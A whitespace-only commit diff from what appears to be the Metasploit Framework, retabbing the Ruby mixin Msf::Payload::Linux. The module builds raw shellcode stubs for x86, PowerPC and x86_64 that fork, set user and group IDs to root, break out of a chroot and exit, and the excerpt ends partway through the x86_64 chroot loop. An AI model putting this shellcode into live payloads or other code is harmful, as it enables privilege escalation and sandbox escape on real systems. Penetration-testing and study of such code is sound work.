Retab changes for PR #2325
parent
5ff25d8b96
commit
896bb129cd
|
@ -10,421 +10,421 @@ require 'msf/core'
|
|||
###
|
||||
module Msf::Payload::Linux
|
||||
|
||||
#
|
||||
# This mixin is chained within payloads that target the Linux platform.
|
||||
# It provides special prepends, to support things like chroot and setuid.
|
||||
#
|
||||
def initialize(info = {})
|
||||
ret = super(info)
|
||||
#
|
||||
# This mixin is chained within payloads that target the Linux platform.
|
||||
# It provides special prepends, to support things like chroot and setuid.
|
||||
#
|
||||
def initialize(info = {})
|
||||
ret = super(info)
|
||||
|
||||
register_advanced_options(
|
||||
[
|
||||
Msf::OptBool.new('PrependFork',
|
||||
[
|
||||
false,
|
||||
"Prepend a stub that executes: if (fork()) { exit(0); }",
|
||||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('PrependSetresuid',
|
||||
[
|
||||
false,
|
||||
"Prepend a stub that executes the setresuid(0, 0, 0) system call",
|
||||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('PrependSetreuid',
|
||||
[
|
||||
false,
|
||||
"Prepend a stub that executes the setreuid(0, 0) system call",
|
||||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('PrependSetuid',
|
||||
[
|
||||
false,
|
||||
"Prepend a stub that executes the setuid(0) system call",
|
||||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('PrependSetresgid',
|
||||
[
|
||||
false,
|
||||
"Prepend a stub that executes the setresgid(0, 0, 0) system call",
|
||||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('PrependSetregid',
|
||||
[
|
||||
false,
|
||||
"Prepend a stub that executes the setregid(0, 0) system call",
|
||||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('PrependSetgid',
|
||||
[
|
||||
false,
|
||||
"Prepend a stub that executes the setgid(0) system call",
|
||||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('PrependChrootBreak',
|
||||
[
|
||||
false,
|
||||
"Prepend a stub that will break out of a chroot (includes setreuid to root)",
|
||||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('AppendExit',
|
||||
[
|
||||
false,
|
||||
"Append a stub that executes the exit(0) system call",
|
||||
"false"
|
||||
]
|
||||
),
|
||||
], Msf::Payload::Linux)
|
||||
register_advanced_options(
|
||||
[
|
||||
Msf::OptBool.new('PrependFork',
|
||||
[
|
||||
false,
|
||||
"Prepend a stub that executes: if (fork()) { exit(0); }",
|
||||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('PrependSetresuid',
|
||||
[
|
||||
false,
|
||||
"Prepend a stub that executes the setresuid(0, 0, 0) system call",
|
||||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('PrependSetreuid',
|
||||
[
|
||||
false,
|
||||
"Prepend a stub that executes the setreuid(0, 0) system call",
|
||||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('PrependSetuid',
|
||||
[
|
||||
false,
|
||||
"Prepend a stub that executes the setuid(0) system call",
|
||||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('PrependSetresgid',
|
||||
[
|
||||
false,
|
||||
"Prepend a stub that executes the setresgid(0, 0, 0) system call",
|
||||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('PrependSetregid',
|
||||
[
|
||||
false,
|
||||
"Prepend a stub that executes the setregid(0, 0) system call",
|
||||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('PrependSetgid',
|
||||
[
|
||||
false,
|
||||
"Prepend a stub that executes the setgid(0) system call",
|
||||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('PrependChrootBreak',
|
||||
[
|
||||
false,
|
||||
"Prepend a stub that will break out of a chroot (includes setreuid to root)",
|
||||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('AppendExit',
|
||||
[
|
||||
false,
|
||||
"Append a stub that executes the exit(0) system call",
|
||||
"false"
|
||||
]
|
||||
),
|
||||
], Msf::Payload::Linux)
|
||||
|
||||
ret
|
||||
end
|
||||
ret
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Overload the generate() call to prefix our stubs
|
||||
#
|
||||
def generate(*args)
|
||||
# Call the real generator to get the payload
|
||||
buf = super(*args)
|
||||
pre = ''
|
||||
app = ''
|
||||
#
|
||||
# Overload the generate() call to prefix our stubs
|
||||
#
|
||||
def generate(*args)
|
||||
# Call the real generator to get the payload
|
||||
buf = super(*args)
|
||||
pre = ''
|
||||
app = ''
|
||||
|
||||
test_arch = [ *(self.arch) ]
|
||||
test_arch = [ *(self.arch) ]
|
||||
|
||||
# Handle all x86 code here
|
||||
if (test_arch.include?(ARCH_X86))
|
||||
# Handle all x86 code here
|
||||
if (test_arch.include?(ARCH_X86))
|
||||
|
||||
# Prepend
|
||||
# Prepend
|
||||
|
||||
if (datastore['PrependFork'])
|
||||
pre << "\x6a\x02" +# pushb $0x2 #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" +# int $0x80 ; fork #
|
||||
"\x85\xc0" +# test %eax,%eax #
|
||||
"\x74\x06" +# jz 0xf #
|
||||
"\x31\xc0" +# xor %eax,%eax #
|
||||
"\xb0\x01" +# movb $0x1,%al ; exit #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
if (datastore['PrependFork'])
|
||||
pre << "\x6a\x02" +# pushb $0x2 #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" +# int $0x80 ; fork #
|
||||
"\x85\xc0" +# test %eax,%eax #
|
||||
"\x74\x06" +# jz 0xf #
|
||||
"\x31\xc0" +# xor %eax,%eax #
|
||||
"\xb0\x01" +# movb $0x1,%al ; exit #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetresuid'])
|
||||
# setresuid(0, 0, 0)
|
||||
pre << "\x31\xc9" +# xorl %ecx,%ecx #
|
||||
"\x31\xdb" +# xorl %ebx,%ebx #
|
||||
"\xf7\xe3" +# mull %ebx #
|
||||
"\xb0\xa4" +# movb $0xa4,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
if (datastore['PrependSetresuid'])
|
||||
# setresuid(0, 0, 0)
|
||||
pre << "\x31\xc9" +# xorl %ecx,%ecx #
|
||||
"\x31\xdb" +# xorl %ebx,%ebx #
|
||||
"\xf7\xe3" +# mull %ebx #
|
||||
"\xb0\xa4" +# movb $0xa4,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetreuid'])
|
||||
# setreuid(0, 0)
|
||||
pre << "\x31\xc9" +# xorl %ecx,%ecx #
|
||||
"\x31\xdb" +# xorl %ebx,%ebx #
|
||||
"\x6a\x46" +# pushl $0x46 #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
if (datastore['PrependSetreuid'])
|
||||
# setreuid(0, 0)
|
||||
pre << "\x31\xc9" +# xorl %ecx,%ecx #
|
||||
"\x31\xdb" +# xorl %ebx,%ebx #
|
||||
"\x6a\x46" +# pushl $0x46 #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetuid'])
|
||||
# setuid(0)
|
||||
pre << "\x31\xdb" +# xorl %ebx,%ebx #
|
||||
"\x6a\x17" +# pushl $0x17 #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
if (datastore['PrependSetuid'])
|
||||
# setuid(0)
|
||||
pre << "\x31\xdb" +# xorl %ebx,%ebx #
|
||||
"\x6a\x17" +# pushl $0x17 #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetresgid'])
|
||||
# setresgid(0, 0, 0)
|
||||
pre << "\x31\xc9" +# xorl %ecx,%ecx #
|
||||
"\x31\xdb" +# xorl %ebx,%ebx #
|
||||
"\xf7\xe3" +# mull %ebx #
|
||||
"\xb0\xaa" +# movb $0xaa,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
if (datastore['PrependSetresgid'])
|
||||
# setresgid(0, 0, 0)
|
||||
pre << "\x31\xc9" +# xorl %ecx,%ecx #
|
||||
"\x31\xdb" +# xorl %ebx,%ebx #
|
||||
"\xf7\xe3" +# mull %ebx #
|
||||
"\xb0\xaa" +# movb $0xaa,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetregid'])
|
||||
# setregid(0, 0)
|
||||
pre << "\x31\xc9" +# xorl %ecx,%ecx #
|
||||
"\x31\xdb" +# xorl %ebx,%ebx #
|
||||
"\x6a\x47" +# pushl $0x47 #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
if (datastore['PrependSetregid'])
|
||||
# setregid(0, 0)
|
||||
pre << "\x31\xc9" +# xorl %ecx,%ecx #
|
||||
"\x31\xdb" +# xorl %ebx,%ebx #
|
||||
"\x6a\x47" +# pushl $0x47 #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetgid'])
|
||||
# setgid(0)
|
||||
pre << "\x31\xdb" +# xorl %ebx,%ebx #
|
||||
"\x6a\x2e" +# pushl $0x2e #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
if (datastore['PrependChrootBreak'])
|
||||
# setreuid(0, 0)
|
||||
pre << "\x31\xc9" +# xorl %ecx,%ecx #
|
||||
"\x31\xdb" +# xorl %ebx,%ebx #
|
||||
"\x6a\x46" +# pushl $0x46 #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
if (datastore['PrependSetgid'])
|
||||
# setgid(0)
|
||||
pre << "\x31\xdb" +# xorl %ebx,%ebx #
|
||||
"\x6a\x2e" +# pushl $0x2e #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
if (datastore['PrependChrootBreak'])
|
||||
# setreuid(0, 0)
|
||||
pre << "\x31\xc9" +# xorl %ecx,%ecx #
|
||||
"\x31\xdb" +# xorl %ebx,%ebx #
|
||||
"\x6a\x46" +# pushl $0x46 #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
|
||||
# break chroot
|
||||
pre << "\x6a\x3d" +# pushl $0x3d #
|
||||
# build dir str (ptr in ebx)
|
||||
"\x89\xe3" +# movl %esp,%ebx #
|
||||
# mkdir(dir)
|
||||
"\x6a\x27" +# pushl $0x27 #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" +# int $0x80 #
|
||||
# chroot(dir)
|
||||
"\x89\xd9" +# movl %ebx,%ecx #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" +# int $0x80 #
|
||||
# build ".." str (ptr in ebx)
|
||||
"\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
# break chroot
|
||||
pre << "\x6a\x3d" +# pushl $0x3d #
|
||||
# build dir str (ptr in ebx)
|
||||
"\x89\xe3" +# movl %esp,%ebx #
|
||||
# mkdir(dir)
|
||||
"\x6a\x27" +# pushl $0x27 #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" +# int $0x80 #
|
||||
# chroot(dir)
|
||||
"\x89\xd9" +# movl %ebx,%ecx #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" +# int $0x80 #
|
||||
# build ".." str (ptr in ebx)
|
||||
"\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
|
||||
"\x66\x68\x2e\x2e" +# pushw $0x2e2e #
|
||||
"\x89\xe3" +# movl %esp,%ebx #
|
||||
# loop changing dir
|
||||
"\x6a\x3d" +# pushl $0x1e #
|
||||
"\x59" +# popl %ecx #
|
||||
"\xb0\x0c" +# movb $0xc,%al #
|
||||
"\xcd\x80" +# int $0x80 #
|
||||
"\xe2\xfa" +# loop -6 #
|
||||
# final chroot
|
||||
"\x6a\x3d" +# pushl $0x3d #
|
||||
"\x89\xd9" +# movl %ebx,%ecx #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
"\x66\x68\x2e\x2e" +# pushw $0x2e2e #
|
||||
"\x89\xe3" +# movl %esp,%ebx #
|
||||
# loop changing dir
|
||||
"\x6a\x3d" +# pushl $0x1e #
|
||||
"\x59" +# popl %ecx #
|
||||
"\xb0\x0c" +# movb $0xc,%al #
|
||||
"\xcd\x80" +# int $0x80 #
|
||||
"\xe2\xfa" +# loop -6 #
|
||||
# final chroot
|
||||
"\x6a\x3d" +# pushl $0x3d #
|
||||
"\x89\xd9" +# movl %ebx,%ecx #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
# Append exit(0)
|
||||
# Append exit(0)
|
||||
|
||||
if (datastore['AppendExit'])
|
||||
app << "\x31\xdb" +# xorl %ebx,%ebx #
|
||||
"\x6a\x01" +# pushl $0x01 #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
if (datastore['AppendExit'])
|
||||
app << "\x31\xdb" +# xorl %ebx,%ebx #
|
||||
"\x6a\x01" +# pushl $0x01 #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
# Handle all Power/CBEA code here
|
||||
elsif (test_arch.include?([ ARCH_PPC, ARCH_PPC64, ARCH_CBEA, ARCH_CBEA64 ]))
|
||||
# Handle all Power/CBEA code here
|
||||
elsif (test_arch.include?([ ARCH_PPC, ARCH_PPC64, ARCH_CBEA, ARCH_CBEA64 ]))
|
||||
|
||||
# Prepend
|
||||
# Prepend
|
||||
|
||||
if (datastore['PrependSetresuid'])
|
||||
# setresuid(0, 0, 0)
|
||||
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
|
||||
"\x7c\xa5\x2a\x78" +# xor r5,r5,r5 #
|
||||
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
|
||||
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\xa5" +# addi r0,r31,-347 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
end
|
||||
if (datastore['PrependSetresuid'])
|
||||
# setresuid(0, 0, 0)
|
||||
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
|
||||
"\x7c\xa5\x2a\x78" +# xor r5,r5,r5 #
|
||||
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
|
||||
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\xa5" +# addi r0,r31,-347 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetreuid'])
|
||||
# setreuid(0, 0)
|
||||
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
|
||||
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
|
||||
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\x47" +# addi r0,r31,-441 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
end
|
||||
if (datastore['PrependSetreuid'])
|
||||
# setreuid(0, 0)
|
||||
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
|
||||
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
|
||||
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\x47" +# addi r0,r31,-441 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetuid'])
|
||||
# setuid(0)
|
||||
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
|
||||
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\x18" +# addi r0,r31,-488 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
end
|
||||
if (datastore['PrependSetuid'])
|
||||
# setuid(0)
|
||||
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
|
||||
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\x18" +# addi r0,r31,-488 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetresgid'])
|
||||
# setresgid(0, 0, 0)
|
||||
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
|
||||
"\x7c\xa5\x2a\x78" +# xor r5,r5,r5 #
|
||||
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
|
||||
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\xab" +# addi r0,r31,-341 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
end
|
||||
if (datastore['PrependSetresgid'])
|
||||
# setresgid(0, 0, 0)
|
||||
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
|
||||
"\x7c\xa5\x2a\x78" +# xor r5,r5,r5 #
|
||||
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
|
||||
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\xab" +# addi r0,r31,-341 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetregid'])
|
||||
# setregid(0, 0)
|
||||
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
|
||||
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
|
||||
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\x48" +# addi r0,r31,-440 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
end
|
||||
if (datastore['PrependSetregid'])
|
||||
# setregid(0, 0)
|
||||
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
|
||||
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
|
||||
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\x48" +# addi r0,r31,-440 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetgid'])
|
||||
# setgid(0)
|
||||
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
|
||||
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\x2f" +# addi r0,r31,-465 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
end
|
||||
if (datastore['PrependSetgid'])
|
||||
# setgid(0)
|
||||
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
|
||||
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\x2f" +# addi r0,r31,-465 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
end
|
||||
|
||||
if (datastore['PrependChrootBreak'])
|
||||
# setreuid(0, 0)
|
||||
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
|
||||
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
|
||||
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\x47" +# addi r0,r31,-441 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
if (datastore['PrependChrootBreak'])
|
||||
# setreuid(0, 0)
|
||||
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
|
||||
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
|
||||
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\x47" +# addi r0,r31,-441 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
|
||||
# EEK! unsupported...
|
||||
end
|
||||
# EEK! unsupported...
|
||||
end
|
||||
|
||||
# Append exit(0)
|
||||
# Append exit(0)
|
||||
|
||||
if (datastore['AppendExit'])
|
||||
app << "\x3b\xe0\x01\xff" +# li r31,511 #
|
||||
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\x02" +# addi r0,r31,-510 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
end
|
||||
if (datastore['AppendExit'])
|
||||
app << "\x3b\xe0\x01\xff" +# li r31,511 #
|
||||
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\x02" +# addi r0,r31,-510 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
end
|
||||
|
||||
elsif (test_arch.include?(ARCH_X86_64))
|
||||
elsif (test_arch.include?(ARCH_X86_64))
|
||||
|
||||
if (datastore['PrependFork'])
|
||||
# if (fork()) { exit(0); }
|
||||
pre << "\x6a\x39" # push 57 ; __NR_fork #
|
||||
pre << "\x58" # pop rax #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
pre << "\x48\x85\xc0" # test rax,rax #
|
||||
pre << "\x74\x08" # jz 0x08 #
|
||||
pre << "\x48\x31\xff" # xor rdi,rdi #
|
||||
pre << "\x6a\x3c" # push 60 ; __NR_exit #
|
||||
pre << "\x58" # pop rax #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
end
|
||||
if (datastore['PrependFork'])
|
||||
# if (fork()) { exit(0); }
|
||||
pre << "\x6a\x39" # push 57 ; __NR_fork #
|
||||
pre << "\x58" # pop rax #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
pre << "\x48\x85\xc0" # test rax,rax #
|
||||
pre << "\x74\x08" # jz 0x08 #
|
||||
pre << "\x48\x31\xff" # xor rdi,rdi #
|
||||
pre << "\x6a\x3c" # push 60 ; __NR_exit #
|
||||
pre << "\x58" # pop rax #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetresuid'])
|
||||
# setresuid(0, 0, 0)
|
||||
pre << "\x48\x31\xff" # xor rdi,rdi #
|
||||
pre << "\x48\x89\xfe" # mov rsi,rdi #
|
||||
pre << "\x6a\x75" # push 0x75 #
|
||||
pre << "\x58" # pop rax #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
end
|
||||
if (datastore['PrependSetresuid'])
|
||||
# setresuid(0, 0, 0)
|
||||
pre << "\x48\x31\xff" # xor rdi,rdi #
|
||||
pre << "\x48\x89\xfe" # mov rsi,rdi #
|
||||
pre << "\x6a\x75" # push 0x75 #
|
||||
pre << "\x58" # pop rax #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetreuid'])
|
||||
# setreuid(0, 0)
|
||||
pre << "\x48\x31\xff" # xor rdi,rdi #
|
||||
pre << "\x48\x89\xfe" # mov rsi,rdi #
|
||||
pre << "\x48\x89\xf2" # mov rdx,rsi #
|
||||
pre << "\x6a\x71" # push 0x71 #
|
||||
pre << "\x58" # pop rax #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
end
|
||||
if (datastore['PrependSetreuid'])
|
||||
# setreuid(0, 0)
|
||||
pre << "\x48\x31\xff" # xor rdi,rdi #
|
||||
pre << "\x48\x89\xfe" # mov rsi,rdi #
|
||||
pre << "\x48\x89\xf2" # mov rdx,rsi #
|
||||
pre << "\x6a\x71" # push 0x71 #
|
||||
pre << "\x58" # pop rax #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetuid'])
|
||||
# setuid(0)
|
||||
pre << "\x48\x31\xff" # xor rdi,rdi #
|
||||
pre << "\x6a\x69" # push 0x69 #
|
||||
pre << "\x58" # pop rax #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
end
|
||||
if (datastore['PrependSetuid'])
|
||||
# setuid(0)
|
||||
pre << "\x48\x31\xff" # xor rdi,rdi #
|
||||
pre << "\x6a\x69" # push 0x69 #
|
||||
pre << "\x58" # pop rax #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetresgid'])
|
||||
# setresgid(0, 0, 0)
|
||||
pre << "\x48\x31\xff" # xor rdi,rdi #
|
||||
pre << "\x48\x89\xfe" # mov rsi,rdi #
|
||||
pre << "\x6a\x77" # push 0x77 #
|
||||
pre << "\x58" # pop rax #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
end
|
||||
if (datastore['PrependSetresgid'])
|
||||
# setresgid(0, 0, 0)
|
||||
pre << "\x48\x31\xff" # xor rdi,rdi #
|
||||
pre << "\x48\x89\xfe" # mov rsi,rdi #
|
||||
pre << "\x6a\x77" # push 0x77 #
|
||||
pre << "\x58" # pop rax #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetregid'])
|
||||
# setregid(0, 0)
|
||||
pre << "\x48\x31\xff" # xor rdi,rdi #
|
||||
pre << "\x48\x89\xfe" # mov rsi,rdi #
|
||||
pre << "\x48\x89\xf2" # mov rdx,rsi #
|
||||
pre << "\x6a\x72" # push 0x72 #
|
||||
pre << "\x58" # pop rax #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
end
|
||||
if (datastore['PrependSetregid'])
|
||||
# setregid(0, 0)
|
||||
pre << "\x48\x31\xff" # xor rdi,rdi #
|
||||
pre << "\x48\x89\xfe" # mov rsi,rdi #
|
||||
pre << "\x48\x89\xf2" # mov rdx,rsi #
|
||||
pre << "\x6a\x72" # push 0x72 #
|
||||
pre << "\x58" # pop rax #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetgid'])
|
||||
# setgid(0)
|
||||
pre << "\x48\x31\xff" # xor rdi,rdi #
|
||||
pre << "\x6a\x6a" # push 0x6a #
|
||||
pre << "\x58" # pop rax #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
end
|
||||
if (datastore['PrependSetgid'])
|
||||
# setgid(0)
|
||||
pre << "\x48\x31\xff" # xor rdi,rdi #
|
||||
pre << "\x6a\x6a" # push 0x6a #
|
||||
pre << "\x58" # pop rax #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
end
|
||||
|
||||
if (datastore['PrependChrootBreak'])
|
||||
if (datastore['PrependChrootBreak'])
|
||||
|
||||
# setreuid(0, 0)
|
||||
pre << "\x48\x31\xff" # xor rdi,rdi #
|
||||
pre << "\x48\x89\xfe" # mov rsi,rdi #
|
||||
pre << "\x48\x89\xf8" # mov rax,rdi #
|
||||
pre << "\xb0\x71" # mov al,0x71 #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
# setreuid(0, 0)
|
||||
pre << "\x48\x31\xff" # xor rdi,rdi #
|
||||
pre << "\x48\x89\xfe" # mov rsi,rdi #
|
||||
pre << "\x48\x89\xf8" # mov rax,rdi #
|
||||
pre << "\xb0\x71" # mov al,0x71 #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
|
||||
# generate temp dir name
|
||||
pre << "\x48\xbf" # mov rdi, #
|
||||
pre << Rex::Text.rand_text_alpha(8) # random #
|
||||
pre << "\x56" # push rsi #
|
||||
pre << "\x57" # push rdi #
|
||||
# generate temp dir name
|
||||
pre << "\x48\xbf" # mov rdi, #
|
||||
pre << Rex::Text.rand_text_alpha(8) # random #
|
||||
pre << "\x56" # push rsi #
|
||||
pre << "\x57" # push rdi #
|
||||
|
||||
# mkdir(random,0755)
|
||||
pre << "\x48\x89\xe7" # mov rdi,rsp #
|
||||
pre << "\x66\xbe\xed\x01" # mov si,0755 #
|
||||
pre << "\x6a\x53" # push 0x53 #
|
||||
pre << "\x58" # pop rax #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
# mkdir(random,0755)
|
||||
pre << "\x48\x89\xe7" # mov rdi,rsp #
|
||||
pre << "\x66\xbe\xed\x01" # mov si,0755 #
|
||||
pre << "\x6a\x53" # push 0x53 #
|
||||
pre << "\x58" # pop rax #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
|
||||
# chroot(random)
|
||||
pre << "\x48\x31\xd2" # xor rdx,rdx #
|
||||
pre << "\xb2\xa1" # mov dl,0xa1 #
|
||||
pre << "\x48\x89\xd0" # mov rax,rdx #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
# chroot(random)
|
||||
pre << "\x48\x31\xd2" # xor rdx,rdx #
|
||||
pre << "\xb2\xa1" # mov dl,0xa1 #
|
||||
pre << "\x48\x89\xd0" # mov rax,rdx #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
|
||||
# build .. (ptr in rdi )
|
||||
pre << "\x66\xbe\x2e\x2e" # mov si,0x2e2e #
|
||||
pre << "\x56" # push rsi #
|
||||
pre << "\x48\x89\xe7" # mov rdi,rsp #
|
||||
# build .. (ptr in rdi )
|
||||
pre << "\x66\xbe\x2e\x2e" # mov si,0x2e2e #
|
||||
pre << "\x56" # push rsi #
|
||||
pre << "\x48\x89\xe7" # mov rdi,rsp #
|
||||
|
||||
# loop chdir(..) 69 times
|
||||
# syscall tend to modify rcx can't use loop...
|
||||
pre << "\x6a\x45" # push 0x45 #
|
||||
pre << "\x5b" # pop rbx #
|
||||
pre << "\x6a\x50" # push 0x50 #
|
||||
pre << "\x58" # pop rax #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
pre << "\xfe\xcb" # dec bl #
|
||||
pre << "\x75\xf7" # jnz -7 #
|
||||
# loop chdir(..) 69 times
|
||||
# syscall tend to modify rcx can't use loop...
|
||||
pre << "\x6a\x45" # push 0x45 #
|
||||
pre << "\x5b" # pop rbx #
|
||||
